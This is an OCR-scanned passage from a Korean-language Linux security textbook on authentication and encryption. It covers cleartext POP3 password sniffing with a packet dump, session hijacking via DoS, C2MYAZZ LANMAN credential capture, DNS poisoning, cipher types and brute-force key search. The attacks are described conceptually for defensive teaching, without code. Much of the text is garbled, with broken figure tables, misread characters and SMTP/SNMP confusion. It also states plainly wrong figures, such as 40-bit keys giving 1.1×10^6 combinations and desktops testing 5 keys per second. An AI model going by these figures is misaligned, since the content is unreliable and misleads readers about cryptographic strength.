위한것 인가를 확인하는 과정 이 다. 


鍾變邊 錢變變©繼鹽 






Lirnix 당보안 


제5절. 인증과 암호화 

인증과 암호화는 자료의 안전을 보장하기 위하여 호상 련관된 두가지 기술이다. 인증 
은 서로 통신하고있는 쌍방이 실제로 자기들이 옳다는것을 담보하는 과정이다. 이것은 봉 
사에 가입 하려 는 대 상(말단사용자)뿐아니 라 봉사를 제 공하는 대 상(봉사기 또는 웨 브싸이 
트)에 대 하여서도 마찬가지 로 적용된다. 암호화는 대화조종과정 에 정보가 손상되지 않는 
다는것을 담보한다. 〈〈손상》이라는 의미는 자료흐름에서 정보의 읽기만이 아니라 그것의 
변경도 포함하고있다. 

인증과 암호화는 각기 자체의 고유한 통신대화의 보안을 보장하여야 할 책임을 가지 
고있지만 최상의 보호는 이 두가지가 결합될 때에만 이룩될수 있다. 이리한 리유로 하여 많 
은 보안통신규약들이 이 두가지 특성을 다 포함하고있다. 

3.5.1. 평문전송 

IP 는 일반적 으로 평문자료들을 전송하는데 이것을 보통 순수한 상태의 전송이라고 한 
다. 이것은 자료가 주파수변경 또는 재배렬없이 단순히 원래의 형래로 전송된다는것을 의 
미한다. 전송되 는 자료에 는 자료와 함께 인증정 보가 포함된다. 이 처 리 과정 을 그림 3-33 
에서 설명하였 다. 

그림 3-33 에서는 통신대화에 대한 망분석기보기창을 보여주었다. POP 3 우편의뢰기를 
가지 고 우편을 검 색 하려 는 사용자가 있 다고 하자. 파케 트 3〜5는 련결 을 초기 화하는데 리 
용된 TCP 3-파케 트 신호교환이 다. 파케트 6，7은 POP 3 우편봉사기 에 의뢰 기 가 련결 및 준 
비되였다는것을 알려준다. 파케트 8로부터 매우 흥미 있는 정보들을 알수 있다. 그림 3-33 
의 아래 부분을 보면 파케 트 8에서 자료의 복호화된 내 용을 알수 있 다. 지 령 USER 는 POP 3 
봉사기에 POP 3 의뢰기의 가입등록이름을 보내는데 리용된다. USER 지령 다음의 본문은 체 
계 인증을 시도하는 사용자의 이름이다. 


No. 

Souce 

De$bnabon 

L 뼈 

Summary 

Erf or 

Size 



3 

4 

5 

6 
7 

0000E82F772A 
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OOOOE82F772A 
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OOOOE82F772A 
0020 吐 247F25 

tcp 

tcp 

tcp 

tcp 

1 器 ■ 

Port: 1067 •“ > POP3 SYN 

Port: 的 P3 ~> 10S7 ACK SYN 

Poet: 1067-> 的 P3ACK 

Port: 的 P3 -• 〉 1067ACK PUSH 

Port: 1067 ->P0P3ACK 


84 

84 

64 

97 

64 

323 ᅬ 
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8 明 38 PM 

9 

10 

止 

002Q 산 247F25 

0000E82F772A 

J 

0000E82F772A 

0020AF247F25 

tep 

Icp 

Port:POP3 ->10G7ACKPUSH 

Port:1067-> P0P3ACK 


77 

64 

7 m$ 
162 mt 

0 텔運표 EC9I 

8 58 38 PM 
ft 明 39 PM 

一—년 

0 00 20 AF 24 7F 25 00 00 E8 2F 77 2A 08 00 45 00 

10 00 3S 87 05 40 00 80 06 EF CC CO A8 01 3C CO A8 
20: 01 64 04 2B 00 SE 00 BF 06 D2 00 0D 0D 56 50 18 
30: 22 11 DC 54 00 00 55 53 45 52 20 62 67 61 74 65 
40: 73 0D 0A 

$.y, ../»*. E. 

.5 @ 

d. + .n.VP. 

" T USER bgate 
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그림 3-33. 인증대화를 시작하는 과케트의 해신 
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6E 

04 
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4 


J Deshnahon 


n 


w 1 


0020AF247F25 IOOOOE82F772A 


247F25 
247F25 
OOOOEB2F772A 
002Q4F247F25 


0000E82F772A 
0000E82F772A 
的 2QAF247F25 
0000E82F772A 


0020AF 公 
0020W 경 


Summaty 


Port: 的 P3 -> 1067 ACK PUSH 

Pat ： 1067 -> POP3 ACK 
>cp I Port 1067 -> POP3 ACK PUSH 

■ 'Pat 1067 •◊ 的 P3ACK 

tcp Pat 1067 ~> POP3 ACK PUSH 

tcp Pott:POP3 ™> 10G7 ACK PUSH 

tcp Port:10G7 ~> POP3 ACK 


그림 3-34. 가입등록이■을 접수하는 POP3 봉사기 

그림 3-34 에서 파케트 11의 복호화된 내 용을 볼수 있다. 이것은 POP 3 우편의뢰기 가 
봉사기 에 보내는 다음의 지 령들이다. 지 령 PASS 는 의뢰 기 가 통과단어렬을 보내는데 리 
용된다. 이 지령 다음의 본문은 체계인증을 시도하는 사용자의 통과단어이다. 여기서 알 
수 있는것처럼 통과단어는 평문으로 보인다. 

그림 3-35 에서는 파케트 12의 해신된 내용을 볼수 있다. 이것은 인증시도에 대한 봉 
사기 의 응답이 다. 봉사기 가 가입 등록이 름과 통과단어 결 합을 접 수한다는것 에 주목하여 야 한 
다. 그림 3-36 은 정 당한 가입등록이름과 통과단어를 가지고 체계의 접근을 얻기 위한 인 
증처 리 과정이 다. 사실 파케트들을 해 신할수 있는 사람이 라면 이 사용자의 모든 전자우편 
통보문들을 볼수 있다. 
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그림 3-35. 사용자의 틍과단어를 보내는 POP3 의릐기 
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그림 3-34 에서는 가입등록이름에 대 한 POP 3 봉사기의 응답을 보여주었다. 파케트 9 
의 내 용으로부터 가입등록이 름이 접수되 였다는것 을 알수 있다. 이 가입등록이 름은 그림 3-33 
에서의 가입등록이름과 같다. 만일 사용자의 통과단어를 알수 있다면 체계에 접근하여 충 
분한 정보를 얻을수 있을것이다. 
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그림 3-36. 인증시도를 접속하는 POP3 봉사기 

1) 평문피동감시 

이 POP 3 인증대화는 망분석기를 리용하여 얻는다. 망분석기는 전용하드웨 어도구나 현 
존 체 계 우에서 실행 되는 쏘프트웨 어 이 다. 망분석 기 들은 실제 적 으로 자료흐름을 감시 하기 위 
하여 망우의 모든 자료를 다 전송할 필요가 없다는 의미에서 피동장치들이다. 어떤 분석 
기 들은(보통 관리상태를 알아내 기 위한 목적 에서 ) 자료흐름을 전송하는데 이 것은 득 필요 
한것은 아니다. 사실상 분석기는 유효한 망주소를 요구하지도 않는다. 이것은 망분석기가 
망을 감시할수 있 다는것 을 의 미하며 케 블추적 과 집 선기 및 교환기 포구들을 조사하지 않고 
서 는 그것 의 존재 를 알아낼수 없 다는것 을 의 미한다. 

공격 자는 손상된 체계우에 망분석기쏘프트웨어를 설치할수 있다. 이것은 공격 자가 자 
료흐름을 감시 하기 위하여 설비 에 물리적 으로 접 근할 필요가 없다는것을 의미한다. 공격 
자는 간단히 현존 체 계 들중의 하나를 리 용하여 목적 하는 자료흐름을 얻 을수 있 다. 그러 므 
로 체 계들에 대 한 정상적 인 검 열을 진행하는것 이 아주 중요하다. 

망분석기가 통신대화를 얻기 위하여서는 대화경로의 어느한 곳에 련결되여야 한다. 이 
것은 망우에서 대화를 시작하는 체계와 목적지체계사이의 어느 한점이 될수 있다. 이것은 
또한 대화의 어느 한쪽 끝에 있는 체계를 손상시킴으로써 실현할수도 있다. 이것은 공격 
자가 원격위 치 에서 인터네 트상의 망자료흐름을 얻 을수 없다는것을 의 미한다. 공격 자는 반 
드시 망내부에 어떤 형 태의 감시 기 나 분석 기를 배 치하여 야 한다. 

2) 평문통신규약 

POP 3 은 평문으로 통신하는 유일한 IP 봉사는 아니 다. 거의 모든 IP 봉사들이 인증과 암 
호화를 제공하지 않으며 평문으로 자료를 전송한다. 일부 평문봉사들은 다음과 같다. 
u FTP : 인증은 평문이 다. 

^ Telnet : 인증은 평문이 다. 

^ SMTP : 우편통보문의 내 용은 평문이 다. 

쇼/@ HTTP : 홈안에 있는 페지내용과 내용들은 평문이다. 
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^ IMAP : 인증은 평문이 다. 

^ SNMPvl : 인증은 평문이 다. 
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SNMPvl 이 평문을 리용한다는것 은 보안상 대 단히 위 험 하다. SNMP 는 망장치 들을 관 
리하고 문의하는데 리용된다. 이러한 장치들에는 교환기와 경로기 지어 봉사기와 방화벽 
까지도 포함된다. SMTP 통과암호가 로출되면 공격자는 망에 커다란 피해를 줄수 있다. 
SNMPv 2 와 SNMPv 3 은 열 린최 단경 로규약 ( OSPF ) 과 류사한 통보문알고리 듬을 포함한다. 
이것은 원래의 SNMP 보다 높은 준위의 안전성과 자료완전성을 보장한다. 유감스럽게도 많 
은 망장치들이 SNMPv 3 은 물론 SNMPv 2 도 지원하지 못하고있다. 현재는 SNMPvl 이 널 
리 리용된다. 

3.5.2. 인증의 필요성 

인증에 대한 요구는 현재에 와서는 명백한것으로 되였다. 평문으로 전송되는 가입등 
륵정보는 감시하기 매우 쉽다. 쉽게 해득될수 있는 가입방법은 통과암호가 변경되지 않는 
환경에서 보다 큰 문제를 발생시킬수 있다. 이리한 경우 공격자는 손상된 체계를 리용하 
여 망을 쉽게 공격 할수 있다. 대부분의 사용자들은 같은 가입등록이름과 통과암호를 오래 
동안 리용하려고 한다. 

강력한 인증은 가입초기 에 봉사접속을 하려는 원천들이 정 당한가를 확인한다. 또한 통 
신대화과정에 원천이 공격하는 호스트에 의하여 교체되지 않았는가를 확인한다. 이러한 형 
태의 공격을 흔히 대화가로채기 라고 한다. 


1) 대화가로채기 

그림 3-37 에 제시된 망을 고찰하자. 의뢰기는 봉사기와 불안전한 망련결상태에서 통 
신하고있다. 의뢰기는 이미 봉사기에 인증되였고 접근이 허락되였다. 한가지 흥미있는 실 
례를 만들어보자. 의뢰 기 가 관리 자준위특권을 가진다고 가정 하자. 공격 자는 의뢰 기 와 봉 
사기사이의 망토막에 있으면서 대화를 감시하면서 대화에 리용되는 포구와 순서번호들을 알 
아낸다. 

€% ^「ᅳ P 擊 

라기 a 라기 

공격자 

봉사기 




그림 3-37. 중개자공격의 실례 
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이제 공격 자가 관리 자준위의 득권을 가진 새 로운 뒤 문을 형성 하기 위 하여 관리 자의 대 
화를 가로채려한다고 가정하자. 먼저 공격자는 의뢰기가 봉사기와 더는 통신할수 없는 상 
태 로 만들어 놓는다. 이 를 위하여 공격 자는 WinNuke 와 같은 도구프로그람을 리용하든가 
또는 DoS 공격을 리용하여 의뢰기를 정지시킨다. 또한 ICMP 범람과 같은 공격으로 정지 
시 킬수도 있다. 어떤 형 태의 공격 을 진행하든 그 목적 은 의뢰기 가 봉사기 에서 보낸 자료 
흐름에 응답할수 없도록 하는것이다. 

ICMP 범람의 목표로 된 체계는 ICMP 요구에 응답하는데 많은 시간을 소비하기때문에 
다른 통신들은 진행할수 없다. 

결 국 의 뢰 기 가 마비 되 고 공격 자는 마치 자기 가 의 뢰 기 인것 처 럼 봉사기 와 자유롭게 통 
신하게 된다. 공격자는 의뢰기에로 오는 봉사기의 응답을 받아 적당한 응답을 만든다. 만 
일 공격 자가 IP 에 대 한 상세한 지식 을 가지 고있다면 봉사기 로부터 예견되는 응답에 기 초 
하여 봉사기의 응답과 전송포구 그리고 순서번호들을 완전히 무시해 버릴수 있다. 어느 경 
우에나 공격 자는 봉사기 가 여 전히 원래 의 의뢰기 와 통신하고있는듯이 만들어놓는다. 

결국 강력한 인증을 통하여 원천체계가 다른 체계와 바꾸어지지 않았다는것을 확증하 
여야 한다. 이것은 두 체계가 통신대화과정에 서로 비밀정보를 교환하는 방법으로 해결할 
수 있다. 비밀정보는 대화과정에 전송되는 매 파케트마다 또는 우연시간간격으로 교환할 
수 있다. 명백히 매 파케트마다 원천을 확인하는것이 우연시간간격으로 원천을 확인하는 
것보다 훨씬 더 안전하다. 통신대화과정에 매 파케트를 교환할 때마다 비밀정보를 바꾸면 
보다 안전하다. 이렇게 하면 대화는 대화가로채기에 보다 안전하도록 할수 있다. 

2) 목적지확인 

통신대 화가 시 작된 때 로부터 전 과정 에 원천을 확인하여 야 한다는것 은 명 백하다. 그 
러 나 봉사기 를 확인할데 대 한 요구는 명 백하지 않다. 많은 사람들은 자기 의 봉사기 에 련 
결하거나 어떤 형태의 호스트로부터 도달불가능한 통보문을 받는것을 당연한것으로 생각 
하고있다. 그러나 그들이 대화하고있는 봉사기가 사실상 망을 공격하려는 공격자일수도 있 
다는것은 모를수 있다. 

도구프로그람 C 2 MYAZZ 는 대 화가로채 기 혹은 중개 자로 알려진 봉사기 속임 공격 의 전 
형적인 실례이다. Windows 95가 처음으로 나왔을 때 그것은 대화통보문블로크 ( SMB ) 체 
계 에 인증하는 두가지 방법 을 가지 고있 었 다. 암호화된 통과암호를 리용하여 인증하는것 이 
기정으로 되여있었다. Windows NT 령역에서의 인증에도 이 방법이 리용되였다. 그러나 
SMB LANMAN 봉사기 와의 아래 방향호환성 을 보장하기 위 하여 LANMAN 인증도 리 용되 
였 다. LANMAN 은 가입 등록이 름과 통과암호를 평 문으로 전송할것 을 요구한다. C 2 MYAZZ 
가 기동하면 그것은 의뢰기 가 NT 봉사기 에 인증될 때를 피동적 으로 기 다린다. 가입등록이 
검 출되것 C 2 MYAZZ 는 LANMAN 인증을 요구하는 하나의 파케 트를 의뢰 기 에 보낸다. 
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의뢰기는 이 파케트를 가입등록을 요구한 봉사기에서 보낸것으로 믿고 증서를 평문으 
로 다시 전송한다. 이때 C 2 MYAZZ 도구프로그람은 가입 등록이 름과 통과암호를 획득하여 현 
시 한다. C 2 MYAZZ 는 의뢰기의 대화를 파괴하지 않고 사용자가 여전히 가입하여 체 계접 
근을 실현할수 있게 한다. 이 도구프로그람의 특징은 하나의 기동디스크로 실행할수 있다 
는것 이 다. 다시말하여 공격자는 이 디스크로 체계를 기동시 킨 후에 얻어진 증서를 가지기 
만 하면 된다. 

3) DNS 중독 

인증을 필요로 하는 또 다른것 은 DNS 중독이 다. 일명 완충기 억 중독이 라고도 하는 DNS 
중독는 실지 목적지로부터의 자료흐름을 변경시킬 목적으로 특정호스트에 대한 틀린 IP 
주소정보를 넘겨주는 과정 이 다. 

자기 가 인증하려하는 봉사기를 확인하는것은 의뢰기의 증서 또는 대 화의 완전성 을 확 
인하는것만큼 중요하다. 통신과정에 있는 이 세 문제점들은 모두 공격에 대하여 약하다. 

3.5.3. 암호화기술 

암호학은 정보를 후에 다시 회복할수 있는 다른 형태로 전송하는데 리용되는 기술들 
의 집합이다. 이 다른 형태를 암호문이라고 하며 그것은 암호화알고리듬과 암호열쇠에 의 
하여 만들어진다. 암호알고리듬은 단순히 암호화하려는 정보에 적용되는 수학공식이다. 암 
호열쇠는 매번 정보를 알고리듬이 처리할 때 같은 계산조작을 리용하여 암호문이 유도되 
지 않도륵 하기 위하여 알고리듬에 넣어주는 보충적인 변수이다. 

실례로 수자 42가 극히 중요한 수이며 그것을 다른 사람들이 알지 못하도록 지키려 한 
다고 하자. 이 자료를 암호화하기 위하여 다음과 같은 암호알고리 듬을 리 용할수 있 다. 

자료 / 암호화열 쇠 + (2 X 암호화열 쇠 ) 

이 과정 은 암호알고리 듬 그자체 와 암호열쇠 이 두가지 에 달려있 다. 이 두가지 는 다 암 
호문을 만드는데 리용되며 암호문은 새로운 수값으로 된다. 암호문을 되살려 42를 얻어 
내 려면 알고리 듬과 열쇠를 다 가지 고있어 야 한다. 열쇠를 리용하지 않는 씨저 암호 (Caesar 
ciphers ) 로 알려진 암호알고리듬이 있는데 이것은 암호열쇠의 보충적인 안전성을 가지지 못 
하는것 으로 하여 그리 쓰이 지 않는다. 이 암호문을 복호화하기 위하여 씨저암호알고리 듬 
만 알면 된다. 

암호화는 수학공식 들을 리용하므로 다음의 내 용들사이 에 는 공생 관계 가 이 루어 진다. 
^ 알고리듬 
ᄄ 열쇠 

ᄄ 원래의 자료 
^ 암호문 

이것은 이것들중 어느 세 가지 만 알면 4개를 다 유도해 낼수 있음을 의미한다ᅵ외 로 
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되는것은 원래자료와 암호문의 결합을 알 때이다. 만일 이 두가지의 많은 실례들을 가지 
고있다면 알고리듬과 열쇠를 복구해낼수도 있다. 


1) 암호화방법 

암호문을 만드는데는 두가지 방법 이 있다. 

一 흐름 암호 

흐름암호는 자료암호화의 가장 간단한 방법들중의 하나이 다. 흐름암호가 사용될 때 자 
료의 매 비트는 열쇠의 한 비트를 리용하여 련속적으로 암호화된다. 흐름암호의 고전적인 
실례는 Vernam 암호이 다. 이것은 전신타자통신을 암호화하기 위하여 리용되였다. Vernam 
암호의 암호열쇠는 페지의 순환에 들어 있다. 전신전문이 기계 에 들어가면 자료의 한 비트 
가 열쇠의 한 비트와 결합하여 암호문을 만든다. 암호문의 수신자는 같은 폐지의 순환을 리 
용하여 거물과정을 거쳐 본래의 전문을 되살려낸다. 

고정된 길이의 열쇠를 리용하는 Vernam 암호는 여러개의 전문들로부터 얻어진 암호 
문들을 비 교하면 쉽 게 정 확히 추적해 낼수 있다. 흐름암호를 깨 기 더 어 렵게 하려면 가변 
길이의 암호열쇠를 쓰면 된다. 이렇게 함으로써 암호문으로부터 식별해낼수 있는 모형들 
을 막아 치 울수 있 다. 사실 자료 한 비 트에 리용되 는 암호열 쇠 를 우연적 으로 바꾸어 수학 
적으로 열기 불가능한 암호문을 얻을수 있다. 이것은 리용된 서로 다른 우연열쇠들이 암호 
열쇠를 열려고 하는 파괴자에게 단서를 줄수 있는 어떠한 반복모형도 생성하지 않기때문이 
다. 암호화열쇠 를 련속적 으로 변화시 키 는 과정 을 1회 용보충 ( one-time pad ) 이 라고 한다. 


一 블로크암호 

매 한 비트를 암호화하는 흐름암호와는 달리 블로크암호는 일정한 크기의 덩어리 단위 
로 자료를 암호화한다. 블로크암호에서 기본은 매번 얼마만한 자료가 암호화되며 어떤 크 
기의 열쇠가 매 블로크에 작용되는가 하는것을 확인하는것이다. 실례로 자료암호화표준 
( DES ) 은 암호화된 DES 자료가 56 bit 의 열쇠 를 리용하여 64 bit 블로크단위 로 처 리된다는 
것으로 정해졌다. 

블로크암호화를 실현하는데 리용하는 여 러 가지 서 로 다른 알고리 듬들이 있다. 가장 초 
보적인것은 간단히 자료를 택하여 그것을 블로크로 나누어 매개에 대하여 열쇠를 작용시 
키는것 이 다. 이 방법은 효과성은 높지만 반복되는 암호문을 만들수 있다. 만일 자료의 두 
블로크가 정확히 같은 정보를 가지고있다면 암호문의 두 블로크는 역시 동등할것 이 다. 앞 
에서 언급된것 처 럼 파괴 자는 비 우연형 식 으로 반복된 암호문을 리용하여 암호열쇠 를 공격 
할수 있다. 

보다 좋기는 알고리듬의 보다 앞선 결과를 리용하여 보다 후의 열쇠들을 그것과 결합 
하는것이다. 그림 3-38 에 변경시킬수 있는 한가지 방법을 보여주었다. 암호화하려는 자 
료는 DB 1 〜 DB 4 로 이름붙여 진 블로크들에 갈라전다. 초기화벡 토르( IV )가 자료의 시 작에 
모든 블로크들이 완전히 암호화되였다는것을 보여준다. IV 는 단순한 우연기호 
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렬로써 두개의 동일한 통보문으로부터 같은 암호문을 만들어 내지 못한다는것을 담보한다. 
암호문의 첫 블로크 ( CT 1) 을 얻 기 위하여 암호열 쇠 와 자료의 첫 블로크 ( DB 1)， 초기 화 
벡 토르( IV )를 수학적 으로 결합한다. 



Key + IV + DB1 = CT1 
Key + CT1 + DB2 = CT2 
Key + CT2 + DB3 = CT3 
Key + CT3 + DB4 = CT4 

그림 3-38. 블로크암호화 

암호문의 두번째 블로크 CT 2 을 만들 때에는 암호열쇠 암호문의 첫 블로크 CT 1， 두 
번째 자료블로크 DB 2 을수학적 으로 결 합한다. 알고리 듬에 서 변수들이 변하므로 DB 1 과 DB 2 
은 같을수 있어도 결과적인 암호문 CT 1 과 CT 2 은 서로 다른 값을 가전다. 이것은 얻어지 
는 암호문이 완전히 우연적 인것으로 보이도록 충분히 혼잡될수 있게 한다. 얻어지는 암호 
문을 리 용하여 다른 자료블로크를 암호화하는 과정 은 모든 자료블로크들이 처 리될 때 까지 
계속된다. 

암호열쇠와 초기화백토르， 앞서 얻어진 암호문을 수학적으로 결합하는 방법 에는 여 
러가지 가 있 다. 이 모든 방법 들은 다 같은 목적 을 추구하고있는데 그것 은 보기 에 우연적 
인 암호문의 문자렬을 얻어내는것이다. 

一 공개 및 비밀암호열쇠 

지 금까지 모든 암호화기 술들은 비 밀열쇠알고리 듬들을 리용하였 다. 비밀열쇠알고리 듬 
은 암호화와 복호화에 같은 열쇠를 리용한다. 이것은 암호열쇠 가 암호문의 안전성 을 담보 
하기 위하여 비밀로 고수되여야 한다는것을 말해준다. 만일 공격자가 그 비밀열쇠를 알아 
낸다면 모든 암호화된 전문들을 풀어낼수 있을것이다. 정보교환의 안전한 방법을 구축하 
기 위하여 비밀 열쇠교환의 안전한 방법 이 필요하게 된다. 

1976년에 디피 ( W . Diffie ) 와 헬 만 ( M . Heilman ) 은 론문《암호학에서 새로운 방향》 
에서 공개열쇠암호의 개념을 제기하였다. 이 론문은 암호산업에서 혁명으로 되였 
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라 공개열쇠의 생성 과정 은 지 금도 Diffie - Hellman 으로 알려져 있다. 비전문가에 있어서 공 
개 열쇠 는 비밀 열쇠 로부터 수학적 으로 유도된 암호열쇠 이 다. 공개 열쇠 로 암호화된 정 보는 비 
밀열쇠 로만 복호화할수 있으며 비밀열쇠 로 암호화된 정 보는 공개열쇠 로 복호화할수 없다. 
다른 말로 말하여 열쇠들은 대칭이 아니다. 그것들은 특수하게 구성되여 공개열쇠는 자료 
암호화에，비 밀 열쇠 는 암호문복호화에 리용되 게 되 여있 다. 

이것은 열쇠정보를 교환하기 위한 안전한 통로가 요구되지 않게 한다. 공개열쇠는 암 
호화된 전문의 안전성을 여전히 유지하면서 불안전한 통로에서 교환할수 있다. 만일 한 사 
탐이 친구에 게 비밀전문을 보내 려 한다면 그는 친구의 공개열쇠 로 그것 을 암호화해 야 한다. 

Diffie - Hellman 은 인증을 제 공하는데 리용할수도 있 다. 이 것은 수신자의 공개열쇠 로 
전문을 암호화하기 전에 자기의 비밀열쇠로 그것에 서명하여 실현할수 있다. 서명은 자기 
의 비밀열쇠와 전문내용을 처 리하는 간단한 수학적알고리듬이 다. 이것은 유일한 수자식서 
명 을 만들어 내는데 그것은 전문의 뒤 에 붙는다. 전문내용이 서명 을 만드는데 리용되므로 수 
자식서 명은 보내는 매 전문에서 다를것 이 다. 

실례로 어떤 사람이 친구에게 비밀전문을 보낸다고 하자. 먼저 그는 자기의 비밀열쇠 
를 가지 고 수자식서명 을 하고 친구의 공개열쇠 로 전문을 암호화한다. 친구가 전문을 받으 
면 먼저 자기 비밀열쇠로 암호문을 풀고 그의 공개열쇠로 수자식서명을 검사한다. 서명이 
맞으면 그는 전문이 인증된것 이 라는것과 그것 이 전송과정에 바뀌지 않았다는것을 알게 된 
다. 만일 서명이 맞지 않으면 그는 전문이 그의 비밀열쇠로 서명된것이 아니거나 암호문 
이 전송과정에 바뀌였다는것을 알게 된다. 어느 경우에나 수신자는 전문의 내용을 의심하 
게 된다. 


2) 암호화의 약점 

암호화의 약점 에는 세가지가 있다. 

^ 잘못된 처 리 또는 사람의 오유 
^ 암호 그자체의 결함 
^ 폭력공격 

어 느 암호화방법 이 자기 요구에 제 일 알맞는가를 결정할 때 자기 경우의 약점 을 반드 
시 알아야 한다. 

一 잘못된 처 리 또는 사람의 오유 

암호화방법을 고찰할 때 사람의 실수문제를 론의하는것은 좀 이상할수 있지만 이 문 
제는 자료의 안전성을 담보하는데서 결정적인 작용을 한다. 어떤 암호화방법들은 다른 방 
법들에 비하여 열쇠관리가 잘 되지 않을수 있다. 암호화방법을 택할 때에는 적당한 방법 
으로 암호열 쇠 를 관리하는데 요구되 는 정 확한 하부구조를 가져 야 한다. 

비밀열쇠 암호를 사용하려 한다면 호스트들사이에서 열쇠정보를 교환하기 위한 안전한 
방법을 가지고있어야 한다. 비밀열쇠를 단순히 같은 불안전한 통로로 전송하려 한다면 자 
료암호화가 그리 좋은것이 못된다. 간단한 열쇠관리는 공개 및 비밀암호열쇠들이 아주 대 
줄표있것으로 된 원인들중의 하나이 다. 자료를 전송하는데 리용하려고 하는 불안전한 통로 
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상에서 열쇠정보를 교환하는 능력은 큰 흥미를 끈다. 이것은 열쇠관리를 매우 간소화하는 
데 송신자는 비밀열쇠를 안전하게 가지고있고 선택한 어떤 한가지 방법으로 공개열쇠를 전 
송한다. 

열쇠관리를 잘하는것 이 중요하다. 

1940년대 에 이 전 쏘련은 가장 중요한 자료를 암호화하는데 1회 용보충 ( one-time pad ) 
을 리용하였 다. 흐름암호에 대 한 절 에서 도 보았지 만 1회 용보충을 리용한 암호를 푼다는 
것은 수학적 으로 불가능하다. 이것은 물론 사용자가 《one — time 》 의 정 의를 리해한다고 
본다. 하지만 이전 쏘련은 그렇게 하지 않았다. 

암호열쇠들이 짧았으므로 이전 쏘련은 일부 1회용보충열쇠들을 서로 다른 위치들에서 
회 전시 켜 다시 리용하기 시 작했다. 전제 로 한것 은 같은 사용자가 같은 열쇠 를 한번 이 상 리 
용하지 않는한 얻어진 암호문이 충분히 안전하다는것이 였다. 명백히 이 가정은 기본을 놓 
쳤다. 미국은 그중에서 열쇠모형들을 찾아내여 암호문으로부터 정확한 전문을 얻어낼수 있 
었 다. 

5년이상이 나 미 국은 자국내 에서 의 이전 쏘련의 정 탐활동을 추적할수 있었다. 


一 암호의 결함 

정해진 형태의 암호화알고리듬에 어떤 결함이 있겠는가를 결정하는것은 비암호전문가 
에게는 가장 풀기 어려운 문제로 될것이다. 하지만 암호화가 안전한가를 담보하는데서 고 
려 하여 야 할 몇 가지 문제 가 있 다. 

^ 암호화알고리듬을 서술하는 수학식은 공개지식으로 되여야 한다. 기밀성에 의존하 
는 알고리 듬은 쉽 게 탈취당할수 있는 결 함을 가전 다. 

^ 암호화알고리 듬은 철저한 공개검 사를 받아야 한다. 

누구나 알고리 듬을 평 가할수 있 어 야 하며 그 결 과를 자유롭게 론의하여 야 한다. 이 것 
은 알고리 듬의 분석 이 제 한되 지 말아야 한다는것 을 의 미한다. 

^ 암호화알고리 듬은 일정한 시 간동안 공개 적 으로 리용되 여 적 당한 분석 이 진행 되 도 
륵 담보하여 야 한다. 몇 달정 도만 리용하여 보아서 는 시 간적검 사를 받았다고 볼수 없 다. 많 
은 사람들이 DES 암호화를 믿는 리유의 하나는 그것이 거의 15년동안 가동하고있었기때 
문이였다. 

^ 암호화알고리 듬에 서 는 공개 적 인 분석 에 의하여 약점 들이 발견되 지 말아야 한다. 거 
의 모든 암호화알고리듬은 약간의 결함들을 가지고있다. 이러한 결함들로 하여 그 열쇠를 
깨는데 필요한 시간이 가능한 모든 열쇠조합을 만들어보는데 걸리는 시간보다 크게 감소 
될수 있으며 암호문이 쉽게 해득될수 있다. 

이 리 한 간단한 원칙 에 따라 암호화알고리 듬의 상대 적안전성 을 평 가할수 있다. 

一 폭력공격 

폭력공격 은 가능한 모든 열쇠 조합들을 시 도하여 암호문을 푸는 열쇠 를 하나 찾아내 는 
단순한 방법 이 다. 그러 므로 이 공격 을 전체 열쇠 조사라고 한다. 파괴 자는 열쇠 를 ^ 
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는것 이 아니 라 적 당한 시간내 에 가능한 모든 열쇠조합을 시도하려 한다. 모든 암호화알고 
리듬들은 폭력공격에 대하여 취 약하다. 앞단락에 한 쌍의 중요한 용어가 있다. 

첫째는 《 reasonable 》 이다. 공격자는 폭력 공격을 들이대는것이 시간적으로 의미가 있 
어야 한다고 여긴다. 만일 전체 열쇠 조사가 VISA 백금카드번호를 몇시간안에 풀어낸다면 공 
격은 가치가 있는것이다. 

다른 한가지는 《 vulnerable 》 이 다. 모든 암호화알고리 듬들은 폭력공격 을 받을수 있 
으나 몇가지는 모든 가능한 열쇠결합들을 시도하는데 지내 오랜 시간이 걸린다. 실례로 1 
회용보충 (one — time pad ) 을 리용한 암호화는 폭력공격을 리용하여 깰수 있지만 공격자는 
그가 죽은 다음에도 몇대의 자손들을 거 쳐서 야 이 계 획을 수행할수 있다. 적 당한 1회 용 
보충 (one — time pad ) 의 암호화방안을 깨는데는 현존하는 계산능력을 동원하여 지구가 없 
어진다고 볼 때까지의 천문학적인 시간이 걸린다. 그래서 폭력공격실현에 요구되는 시간 
량은 두가지 요인에 의존하는데 그것은 특정의 열쇠를 시도하는데 얼마의 시간이 걸리는 
가와 얼마의 가능한 열쇠결 합이 존재 하는가 하는것 이 다. 

매 열쇠검사에 걸리는 시간은 처리에 리용되는 장치에 달려있다. 보통의 탁상콤퓨터 
는 1초에 5개의 열쇠를 검사할수 있다. 암호화열쇠를 열기 위하여 특별히 만들어진 장치 
는 1초에 200개 이상의 열쇠를 검 사할수 있다. 물론 여 러개의 체 계들을 결합하면 그보다 더 
좋은 결과를 얻을수 있다. 

가능한 열 쇠 조합의 수는 열 쇠크기 에 직 접 비 례한다. 크기 는 암호학에 서 중요한 문제 
로 된다. 암호열쇠 가 클수록 보다 많은 열쇠조합들이 존재한다. 표 3-21 은 몇 가지 암호 
화방법 들을 그것 들의 열 쇠크기 에 따라 보여준다. 열 쇠크기 가 증가할수록 가능한 열 쇠조합 
의 수가 지수함수적 으로 증가함을 알수 있다. 


표 3-21. 암호호 

[방법들과 그의 열쇠들 

암호화방법 

열쇠 비 트수 

가능한 열쇠개수 

Netscape 

40 

1.1 X 10 6 

DES 

56 

72.1 X 10 6 

Trple DES (2 열쇠) 

112 

5.2 X 10 33 

IDEA 

128 

3.4 X 10 38 

RC 4(128 bit 열쇠) 

128 

3.4 X 10 38 

Triple DES (3 열쇠) 

168 

3.7 X 10 50 

Blowfish 

448까지 


^ES 

128,192,256 

3.4 X 10 38 
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이것은 특정의 암호화알고리듬에 대하여 전체 열쇠조사를 진행하는데 얼마만한 시간이 
걸 리 는가 하는 물음을 제 기한다. 대 답은 놀라운것 이 다. DES 암호화는 공업표준으로 되 였 
다. DES 암호문렬을 깨고 그 안에 숨겨진 통보문을 알아내는데 얼마나 시간이 걸리는가 
를 알기 위한 모의 실험 이 있었는데 그 결과는 다음과 같다. 

1997년에는 그 실험이 약 5달만에 완성되였다. 

1998년 1월에는 39일만에 완성되였다. 

1999년 1월에는 EFF 가 이것을 22시간내에 끝낼수 있었다. 

EFF 는 DES 암호화를 폭력공격 하기 위하여 특별히 설계된 장치를 통하여 이것을 진 
행하였다. 이 실험후에 EFF 는 《Cracking DES 》 라는 책을 출판하였는데 여기에는 자기 
